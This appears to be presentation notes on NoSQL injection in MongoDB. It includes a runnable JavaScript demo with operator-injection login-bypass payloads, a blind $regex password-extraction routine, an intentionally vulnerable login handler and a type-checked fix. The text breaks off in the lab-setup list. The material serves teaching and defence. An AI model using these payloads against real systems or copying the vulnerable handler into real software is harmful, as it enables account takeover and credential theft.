3. Agenda
SQL vs NoSQL Databases
NoSQL Injection
LAB Creation
LAB Walkthrough
Insecure Coding and secure coding
CVE and exploits
4. Why NoSQL Database?
A relational database usually scales by adding resources to a single server (vertical scaling) and, sometimes, by spreading the load across more servers (horizontal scaling). A system of engagement instead needs an agile delivery layer that can process unstructured data and change shape quickly.
NoSQL databases allow high-performance, agile processing of information at massive scale. They store unstructured data across multiple processing nodes as well as across multiple servers.
1. Key-value stores —> Riak, Voldemort, and Redis
2. Wide-column stores —> Cassandra and HBase
3. Document databases —> MongoDB and CouchDB
4. Graph databases —> Neo4J and HyperGraphDB
6. Query Structure
SQL:
SELECT * FROM table WHERE username = '$username' AND password = '$password'
NoSQL (MongoDB):
db.collection.find({username: "$username", password: "$password"});
In both cases $username and $password are placeholders for values taken from the request. In SQL the attacker has to break out of the quoted string; in MongoDB the danger is that the value itself can be an object carrying query operators when the input arrives as parsed JSON or a query string.
Query Operators in NoSQL:
$ne -> not equal
$gt -> greater than
$regex -> matches a regular expression
$where -> lets you specify a JavaScript expression to filter results
7. NoSQL Injection
NoSQL Injection is a security vulnerability that lets attackers take control of database queries through the unsafe use of user input. An attacker can use it to expose unauthorized information or to modify data. The typical MongoDB vector is a user-supplied value that is not a plain string but an object such as {"$ne": ""}, passed straight into the query object.
➢ db.items.find(queryObject)
○ db — the current database object
○ items — the collection named 'items' in the current database
○ find — the method executed on the collection
○ queryObject — the object used to select the matching documents
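The following is an added example (not code from the slides or the lab) showing the operator injection described above end to end. It uses a tiny in-memory re-implementation of the $ne, $gt and $regex matching rules so it runs without a MongoDB server; the users, the vulnerableLogin and safeLogin handlers, and the extractPassword routine are all constructed for this demonstration. The attack works the same way against a real driver when req.body is passed into find() unchanged.

```javascript
// Constructed sample data standing in for a 'users' collection.
// Plaintext passwords are used only to keep the demo short; real
// applications store password hashes.
const users = [
  { username: "admin", password: "S3cret!42" },
  { username: "alice", password: "wonderland" },
];

// Escape a string so it is matched literally inside a regular expression.
function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Minimal model of how MongoDB evaluates one field of a query object.
// Only the operators listed on the slide are implemented.
function matchesField(actual, expected) {
  if (expected !== null && typeof expected === "object" && !Array.isArray(expected)) {
    // Operator object such as { $ne: "" } or { $regex: "^S" }.
    return Object.entries(expected).every(([op, arg]) => {
      switch (op) {
        case "$ne": return actual !== arg;
        case "$gt": return actual > arg;
        case "$regex": return typeof actual === "string" && new RegExp(arg).test(actual);
        default: throw new Error("unsupported operator " + op);
      }
    });
  }
  // Plain value: exact equality, as in { username: "admin" }.
  return actual === expected;
}

// Equivalent of db.users.find(queryObject) on the in-memory collection.
function find(collection, query) {
  return collection.filter((doc) =>
    Object.entries(query).every(([field, expected]) => matchesField(doc[field], expected))
  );
}

// Vulnerable login: the parsed request body is used as-is, so JSON such as
// {"username":"admin","password":{"$ne":""}} turns into an operator query
// that matches the admin document without knowing the password.
function vulnerableLogin(body) {
  return find(users, { username: body.username, password: body.password }).length > 0;
}

// Hardened login: accept only strings, so operator objects never reach find().
function safeLogin(body) {
  if (typeof body.username !== "string" || typeof body.password !== "string") {
    return false; // anything that is not a plain string is rejected
  }
  return find(users, { username: body.username, password: body.password }).length > 0;
}

// Blind extraction with $regex: the login result is a yes/no oracle, so the
// password can be recovered one character at a time with {"$regex":"^prefix"}.
function extractPassword(loginFn, username, alphabet, maxLen = 32) {
  let known = "";
  while (known.length < maxLen) {
    let extended = false;
    for (const ch of alphabet) {
      const candidate = known + ch;
      if (loginFn({ username, password: { $regex: "^" + escapeRegex(candidate) } })) {
        known = candidate;
        extended = true;
        break;
      }
    }
    if (!extended) break; // no character extends the prefix: stop
    // Anchor both ends to detect that the whole password has been recovered.
    if (loginFn({ username, password: { $regex: "^" + escapeRegex(known) + "$" } })) break;
  }
  return known;
}

const alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!";
console.log("bypass with $ne:", vulnerableLogin({ username: "admin", password: { $ne: "" } }));
console.log("bypass with $gt:", vulnerableLogin({ username: { $ne: "" }, password: { $gt: "" } }));
console.log("recovered password:", extractPassword(vulnerableLogin, "admin", alphabet));
console.log("hardened handler:", safeLogin({ username: "admin", password: { $ne: "" } }));
```

The type check in safeLogin is the simplest fix; stripping keys that start with $ from the parsed body (what express-mongo-sanitize does) is an alternative, but validating the expected type of each field is more robust because it also blocks arrays and nested objects the schema never expected.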
8. LAB Creation
In this NoSQL lab I have implemented actual and possible attack scenarios.
1. VM LAB: use an Alpine or Ubuntu system as required. Installed dependencies: MongoDB and Node.js.
2. Build Code: create possible attack scenarios and write the code.
3. Run & Test: deploy the code and try to bypass the mechanism under test.
4.